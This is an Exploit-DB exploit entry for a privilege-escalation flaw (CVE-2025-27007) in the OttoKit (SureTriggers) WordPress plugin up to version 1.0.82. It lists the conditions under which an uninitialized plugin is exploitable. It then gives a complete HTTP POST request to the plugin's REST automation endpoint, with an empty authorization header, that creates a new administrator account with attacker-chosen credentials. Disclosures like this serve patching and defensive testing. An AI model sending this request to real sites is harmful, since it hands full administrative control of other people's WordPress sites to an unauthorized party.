SureTriggers OttoKit Plugin 1.0.82 - Privilege Escalation

EDB-ID:

52286




Platform:

Multiple

Date:

2025-05-09


 # Exploit Title: SureTriggers OttoKit Plugin 1.0.82 - Privilege Escalation
# Date: 2025-05-7
# Exploit Author: [Abdualhadi khalifa (https://x.com/absholi7ly/)

# Affected: Versions All versions of OttoKit (SureTriggers) ≤ 1.0.82.

Conditions for Exploitation
<https://github.com/absholi7ly/CVE-2025-27007-OttoKit-exploit/#conditions-for-exploitation>

The vulnerability can be exploited under the following circumstances:

   1. OttoKit must be installed and activated on the target WordPress site.
   2. The plugin *uninitialized* (e.g., no API key or "secret_key" is set
   in the database).
   3. The target site displays the REST API endpoint
   '/wp-json/sure-triggers/v1/automation/action'.

------------------------------
HTTP Request
<https://github.com/absholi7ly/CVE-2025-27007-OttoKit-exploit/#http-request>
The following request targets the
/wp-json/sure-triggers/v1/automation/action endpoint to create an
administrator account:

POST /wp-json/sure-triggers/v1/automation/action HTTP/1.1
Host: [target-site]
Content-Type: application/x-www-form-urlencoded
St-Authorization:
Content-Length: [length]

selected_options[user_name]=new_admin&selected_options[user_email]=
attacker@example.com&selected_options[password]=StrongP@ssw0rd123
&selected_options[role]=administrator&aintegration=WordPress&type_event=create_user_if_not_exists